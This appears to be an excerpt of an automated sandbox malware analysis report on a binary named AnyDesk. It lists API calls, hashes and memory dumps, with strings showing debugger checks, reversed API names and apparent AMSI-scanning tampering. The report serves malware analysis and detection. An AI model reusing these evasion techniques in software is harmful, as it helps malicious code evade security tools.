            • Opcode ID: c7b0feed52277b1e427316a36ee256b67e41eebc30372fc3901e9e8952bde9b5
            • Instruction ID: d14ce2d0cd396daf16bcb900c42cd60befd179236d77440887146bf20d08e871
            • Opcode Fuzzy Hash: c7b0feed52277b1e427316a36ee256b67e41eebc30372fc3901e9e8952bde9b5
            • Instruction Fuzzy Hash: B4619331B003689BDF00EBA4D890B9F7BBBDB88300F1085F6E1099B645CA39D90D8F55
            APIs
            • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3B000
            • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B3B017
            • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3B0AB
            • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B3B0B7
            • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B3B0CB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Read$HandleModule
            • String ID: KernelBase$LoadLibraryExA
            • API String ID: 2226866862-113032527
            • Opcode ID: 4972dfebe8d299cfb00ea11c4ea2c5a00b0bbcafdf3e0311b206edd163d0ab77
            • Instruction ID: 684f9a4b7335dbeba6fbc1705389e280d54ae551f2c60d1506eea1b0df903e38
            • Opcode Fuzzy Hash: 4972dfebe8d299cfb00ea11c4ea2c5a00b0bbcafdf3e0311b206edd163d0ab77
            • Instruction Fuzzy Hash: 66317271A40705BBDB21DBA8CC85F5E77A8FF05368F004691FA64EB2C5D730A944CBA0
            APIs
            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B24423,?,?,02BA67C8,?,?,02B4E7A8,02B265B1,02B4D30D), ref: 02B24395
            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B24423,?,?,02BA67C8,?,?,02B4E7A8,02B265B1,02B4D30D), ref: 02B2439B
            • GetStdHandle.KERNEL32(000000F5,02B243E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B24423,?,?,02BA67C8), ref: 02B243B0
            • WriteFile.KERNEL32(00000000,000000F5,02B243E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B24423,?,?), ref: 02B243B6
            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B243D4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: FileHandleWrite$Message
            • String ID: Error$Runtime error at 00000000
            • API String ID: 1570097196-2970929446
            • Opcode ID: d18e94c172ff2a488f98f07e4c5a79ca196de5e498eee2013d920b2a1a41f448
            • Instruction ID: d1ad5809786bf51d618c366d8ddd5a35ea03908849a76fc327334a8123ece8d8
            • Opcode Fuzzy Hash: d18e94c172ff2a488f98f07e4c5a79ca196de5e498eee2013d920b2a1a41f448
            • Instruction Fuzzy Hash: 33F0F671AE4330B4F610A2646D47F59377D9744B62F104AD5B32C554D187F490CC9721
            APIs
              • Part of subcall function 02B2AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2AD59
              • Part of subcall function 02B2AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2AD7D
              • Part of subcall function 02B2AD3C: GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD98
              • Part of subcall function 02B2AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2AE2E
            • CharToOemA.USER32(?,?), ref: 02B2AEFB
            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B2AF18
            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AF1E
            • GetStdHandle.KERNEL32(000000F4,02B2AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AF33
            • WriteFile.KERNEL32(00000000,000000F4,02B2AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AF39
            • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B2AF5B
            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B2AF71
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
            • String ID:
            • API String ID: 185507032-0
            • Opcode ID: f582af90590af2815378c8e62a32343089ca91262ecb7ec7f3ae43548712b4f0
            • Instruction ID: dae949cf2b0ace3b349ba98480399412a42746c24b3ae62cbafaadc2d8ff29f2
            • Opcode Fuzzy Hash: f582af90590af2815378c8e62a32343089ca91262ecb7ec7f3ae43548712b4f0
            • Instruction Fuzzy Hash: 3A112AB2548320AED700FBA4DC85F9B77EDAB44740F404AA5BB58D70E0DA75E9488B62
            APIs
            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E625
            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E641
            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B2E67A
            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E6F7
            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B2E710
            • VariantCopy.OLEAUT32(?,00000000), ref: 02B2E745
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
            • String ID:
            • API String ID: 351091851-0
            • Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
            • Instruction ID: 905eace72bb4a65dacb93e83521761491562da128f75b980024300b6ec3dff4f
            • Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
            • Instruction Fuzzy Hash: 2651F775A117299BCB26DF59C880BDAB3BDAF49300F0045D5EA0CE7211DA30EF898F65
            APIs
            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BA
            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B23609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235ED
            • RegCloseKey.ADVAPI32(?,02B23610,00000000,?,00000004,00000000,02B23609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B23603
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
            • API String ID: 3677997916-4173385793
            • Opcode ID: 556c83bf6b60e1a5519087b5f1682b559aece30153f09baf6d7f2e5e63e84bd3
            • Instruction ID: 55c1b87b21aa38ad064c5123b4d3ca9898c29a9d5115834b75f3b337e387ee0e
            • Opcode Fuzzy Hash: 556c83bf6b60e1a5519087b5f1682b559aece30153f09baf6d7f2e5e63e84bd3
            • Instruction Fuzzy Hash: 9D01B975D54328BAEB12DF908D42BB977ECE708B00F1005E1BA08D7780E674A914CA59
            APIs
            • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
            • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
            • GetProcAddress.KERNEL32(?,?), ref: 02B382D9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: Kernel32$sserddAcorPteG
            • API String ID: 667068680-1372893251
            • Opcode ID: 21a7272927d44431fabb653e945347233449aa1b2d59f2375d1fd0be83d63944
            • Instruction ID: e515fd8d09da502b9b98bb8b09a4424d230bf7ab0008860debacd40b5cc6ef51
            • Opcode Fuzzy Hash: 21a7272927d44431fabb653e945347233449aa1b2d59f2375d1fd0be83d63944
            • Instruction Fuzzy Hash: 5F014F75644314AFEB02EBA4DC41A9EB7FEEB48B00F5184E0B904D7A10DA70A905DE25
            APIs
            • GetThreadLocale.KERNEL32(?,00000000,02B2AAE7,?,?,00000000), ref: 02B2AA68
              • Part of subcall function 02B2A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A7E2
            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B2AAE7,?,?,00000000), ref: 02B2AA98
            • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02B2AAA3
            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B2AAE7,?,?,00000000), ref: 02B2AAC1
            • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02B2AACC
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Locale$InfoThread$CalendarEnum
            • String ID:
            • API String ID: 4102113445-0
            • Opcode ID: 71e5dd4d71e5f06787dbb82fed9c5f0bac54ef77fc0b62ccc4c022b134e96445
            • Instruction ID: c882d84fa7f5f5be9b9bbd9172ada5ce95bb77a66d7bfbb66aa70cf7ccfe06ad
            • Opcode Fuzzy Hash: 71e5dd4d71e5f06787dbb82fed9c5f0bac54ef77fc0b62ccc4c022b134e96445
            • Instruction Fuzzy Hash: 650142B1200724AFFA12BA64CD11BAA735EDF82B10F5001F0F118E66D0DA659E0C8A28
            APIs
            • GetThreadLocale.KERNEL32(?,00000000,02B2ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B2AB2F
              • Part of subcall function 02B2A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A7E2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Locale$InfoThread
            • String ID: eeee$ggg$yyyy
            • API String ID: 4232894706-1253427255
            • Opcode ID: d1cb2b59595d9638ac34e2214495acc1f9e3bd8fdf2b2483c8775eb2c040ce49
            • Instruction ID: 90563617135ff31e02237bd69ce80186f1b53e4338550f175636bae781ac3a22
            • Opcode Fuzzy Hash: d1cb2b59595d9638ac34e2214495acc1f9e3bd8fdf2b2483c8775eb2c040ce49
            • Instruction Fuzzy Hash: 1741D1717043344BDB12EB788C946BEB3FBEB85200B1455E6D45EC3754EA28ED0DCA65
            APIs
            • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B3823C,?,?,00000000,?,02B37A7E,ntdll,00000000,00000000,02B37AC3,?,?,00000000), ref: 02B3820A
              • Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9
            • GetModuleHandleA.KERNELBASE(?), ref: 02B3821E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: HandleModule$AddressProc
            • String ID: AeldnaHeludoMteG$KernelBASE
            • API String ID: 1883125708-1952140341
            • Opcode ID: 4c7ba4d54c513ff9d564605fb73c75bdba09b750c6f5291a81ee15d51a68a104
            • Instruction ID: 3d275dfc3d1d4c0c9cfae198c011713592d8a798a1f0a65732edfbf51036c03f
            • Opcode Fuzzy Hash: 4c7ba4d54c513ff9d564605fb73c75bdba09b750c6f5291a81ee15d51a68a104
            • Instruction Fuzzy Hash: D2F06271A88704BFE702EBA4DC1195EF7FDF74974075248E0B84493A10DA70AE149D26
            APIs
            • GetModuleHandleW.KERNEL32(KernelBase,?,02B3FAEB,UacInitialize,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanBuffer,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,Initialize), ref: 02B3F6EE
            • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3F700
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: IsDebuggerPresent$KernelBase
            • API String ID: 1646373207-2367923768
            • Opcode ID: f8de74c3616cad4ea9320995555b9cff265f0c634632e38e9f3e5e1fc8a36afd
            • Instruction ID: 519dd592fcd81c6078aa964e16ad1ebac1b5422887424b45acf2bf92c5c509da
            • Opcode Fuzzy Hash: f8de74c3616cad4ea9320995555b9cff265f0c634632e38e9f3e5e1fc8a36afd
            • Instruction Fuzzy Hash: B3D012B1B5136059BE0276F41CC4829238D875452D7200EE1B026C64A2E5A6881D5054
            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B4D10B,00000000,02B4D11E), ref: 02B2C47A
            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B2C48B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: GetDiskFreeSpaceExA$kernel32.dll
            • API String ID: 1646373207-3712701948
            • Opcode ID: 9047f40aa714d270ccffae8ebc9649befd635c139b966cf8ff44f7974fe8d8b9
            • Instruction ID: 69788cd69ac7e0eeaa20156db12c61cd2f5fa8df40543428bba8f71a9cfce9ef
            • Opcode Fuzzy Hash: 9047f40aa714d270ccffae8ebc9649befd635c139b966cf8ff44f7974fe8d8b9
            • Instruction Fuzzy Hash: 57D05EB8A407749AFA01AAB254C067B2BD8F728350F0948E6F41D46100E766A41C8F55
            APIs
            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E297
            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E2B3
            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E32A
            • VariantClear.OLEAUT32(?), ref: 02B2E353
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: ArraySafe$Bound$ClearIndexVariant
            • String ID:
            • API String ID: 920484758-0
            • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
            • Instruction ID: 5621d2aa40ec810402abb6419f07ea05697595123261d7d9924f46c805132a81
            • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
            • Instruction Fuzzy Hash: 1B410775A013299BCB62DB59CD90BCAB3BDEF48304F0041D5E64DA7211DA30EF898F65
            APIs
            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2AD59
            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2AD7D
            • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD98
            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2AE2E
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: FileModuleName$LoadQueryStringVirtual
            • String ID:
            • API String ID: 3990497365-0
            • Opcode ID: ef3d3268dc41fa61327dd5ce77103cfd526eaa377d4e60167785be0005eadd26
            • Instruction ID: a8195402b6b1bf08e89d15f88235ef13805cd5548bd37360a17663204484fdc0
            • Opcode Fuzzy Hash: ef3d3268dc41fa61327dd5ce77103cfd526eaa377d4e60167785be0005eadd26
            • Instruction Fuzzy Hash: 4A411971A003689BDB21EB68CC84BDAB7FDAB18340F4444E6A54CE7255DB74AF898F50
            APIs
            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2AD59
            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2AD7D
            • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD98
            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2AE2E
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: FileModuleName$LoadQueryStringVirtual
            • String ID:
            • API String ID: 3990497365-0
            • Opcode ID: 9cc83188bde2d319ff3cab2f9dd9e9a5347b34d5f8b1351acbc4fe88b2d6d60d
            • Instruction ID: 0b8241d929ba484a055cdddf1365eee2a3b0cddd9625d2af44d89081842cc246
            • Opcode Fuzzy Hash: 9cc83188bde2d319ff3cab2f9dd9e9a5347b34d5f8b1351acbc4fe88b2d6d60d
            • Instruction Fuzzy Hash: E6412B71A003689FDB21EB68CC84BDAB7FDAB18340F4444E5A54CE7255DB74AF898F50
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 91b8cc20a86c75cc875005e33946e1524c556adfe5cae5f0d73b0ec20cad4b3a
            • Instruction ID: d42ced1c91559ca9f646a7235829c495fc3599f6dcc8756c02d40ccc9f19da01
            • Opcode Fuzzy Hash: 91b8cc20a86c75cc875005e33946e1524c556adfe5cae5f0d73b0ec20cad4b3a
            • Instruction Fuzzy Hash: 65A116B67303244BD718EA7C9C803ADB396DBC5265F1942BEE12DCB393DB64C94A8650
            APIs
            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B295DA), ref: 02B29572
            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B295DA), ref: 02B29578
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: DateFormatLocaleThread
            • String ID: yyyy
            • API String ID: 3303714858-3145165042
            • Opcode ID: 4c52d9408526b9c922345944c703548652ed5d5c41972e5218c1bcfdfac8df15
            • Instruction ID: 25f790663e3d4ad6268ae2823878551316095ee824850a30062a127bf6cb675f
            • Opcode Fuzzy Hash: 4c52d9408526b9c922345944c703548652ed5d5c41972e5218c1bcfdfac8df15
            • Instruction Fuzzy Hash: 67215C71A007689FDB11DFA8C881AAEB3BDEF09700F5104E5E94DE7651DB309E48CB65
            APIs
              • Part of subcall function 02B381CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B3823C,?,?,00000000,?,02B37A7E,ntdll,00000000,00000000,02B37AC3,?,?,00000000), ref: 02B3820A
              • Part of subcall function 02B381CC: GetModuleHandleA.KERNELBASE(?), ref: 02B3821E
